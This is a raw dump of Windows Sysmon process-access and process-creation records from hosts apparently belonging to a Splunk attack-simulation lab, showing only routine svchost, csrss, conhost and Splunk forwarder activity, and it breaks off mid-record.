12:19:29.202{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015765Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.202{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015764Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.202{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015763Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.202{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015762Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.202{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015761Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.202{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015760Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.202{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015759Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.202{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015758Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.202{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015757Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.202{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E3D1-63C7-EE01-00000000B002}1116C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015756Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.202{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E3D1-63C7-EE01-00000000B002}1116C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015755Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:29.202{E5A8D418-E3D1-63C7-EE01-00000000B002}1116C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000040960Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.108{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E3D1-63C7-1206-00000000AF02}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040959Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.108{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040958Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.108{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040957Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.108{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040956Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.108{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040955Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.108{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E3D1-63C7-1206-00000000AF02}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040954Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.108{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E3D1-63C7-1206-00000000AF02}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000040953Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:29.108{FE4C2B44-E3D1-63C7-1206-00000000AF02}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000040993Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:30.730{FE4C2B44-E3D2-63C7-1406-00000000AF02}63565528C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040992Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:30.574{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E3D2-63C7-1406-00000000AF02}6356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040991Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:30.574{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040990Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:30.574{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040989Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:30.574{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040988Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:30.574{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040987Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:30.574{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E3D2-63C7-1406-00000000AF02}6356C:\Program 